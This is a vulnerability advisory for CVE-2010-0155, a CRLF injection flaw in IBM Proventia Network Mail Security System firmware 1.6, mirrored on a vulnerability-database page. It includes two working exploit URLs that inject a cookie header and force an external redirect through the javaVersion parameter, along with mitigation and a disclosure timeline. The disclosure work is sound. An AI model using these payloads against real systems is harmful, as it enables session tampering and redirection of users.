Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDr. Marian VentuneacPACKETSTORM:93819
HistorySep 14, 2010 - 12:00 a.m.

Proventia Network Mail Security System CRLF Injection

2010-09-1400:00:00
Dr. Marian Ventuneac
packetstormsecurity.com
20

0.001 Low

EPSS

Percentile

35.2%

JSON
`  
Security Advisory: MVSA-10-009 / CVE-2010-0155  
Vendor: IBM   
Products: Proventia Network Mail Security System  
Vulnerabilities: CRLF Injection  
Risk: Medium   
Attack Vector: From Remote   
Authentication: Required  
Reference: http://www.ventuneac.net/security-advisories/MVSA-10-009  
  
  
  
Description  
  
Web-based Local Management Interface (LMI) of IBM Proventia Network Mail Security System appliance (firmware 1.6) is vulnerable to a CRLF Injection vulnerability. When exploited by an authenticated attacker, such vulnerability could lead to compromising the security of the appliance, allowing injection of custom HTTP cookies, forcing external redirects, potential HTTP Response Splitting attacks, etc.  
  
The affected resource is not part of the IBM PNMSS firmware 2.5.  
  
By manipulating the javaVersion parameter of load.php resource, an authenticated attacker can perform the attacks above.  
  
The following exploit allows injecting custom cookies used by the client browser during a valid HTTP session:  
  
url_placeholder/load.php?browVerOK=true&browVerPerfect=false&javaVersion=any%0D%0ASet-cookie: %20MyOwnCookie=SOME_DATA_HERE&javaVendor=Sun%20Microsystems %20Inc.&javaEnabled=true&welcome=true&detectionFlag=1&popupBlocked=no  
  
The following exploit allows forcing external browser redirects:  
  
url_placeholder/load.php?browVerOK=true&browVerPerfect=false&javaVersion=any%0D%0ALocation: %20http://www.google.com%0D%0A&javaVendor=Sun%20Microsystems %20Inc.&javaEnabled=true&welcome=true&detectionFlag=1&popupBlocked=no  
  
  
Affected Versions  
  
IBM Proventia Network Mail Security System - virtual appliance (firmware 1.6)  
  
  
Mitigation  
  
Vendor recommends upgrading to PNMSS firmware 2.5 or later.  
Alternatively, please contact IBM for technical support.   
  
  
Disclosure Timeline  
  
2009, November 07: Vulnerabilities discovered and documented  
2009, November 08: Notification sent to IBM  
2009, November 09: IBM acknowledges receiving the report  
2010, September 12: MVSA-10-009 advisory published.  
  
  
Credits  
  
Dr. Marian Ventuneac  
http://ventuneac.net  
`

Related

securityvulns 2
prion 1
cve 1
securityvulns
securityvulns
MVSA-10-009 / CVE-2010-0155 - IBM Proventia Network Mail Security System - CRLF Injection vulnerability
2010-09-14 00:00:00
IBM Proventia Mail Security System multiple security vulnerabilities
2010-09-14 00:00:00
prion
prion
Crlf injection
2010-09-14 17:00:00
cve
cve
CVE-2010-0155
2010-09-14 17:00:00

0.001 Low

EPSS

Percentile

35.2%

JSON
Related for PACKETSTORM:93819
securityvulns2prion1cve1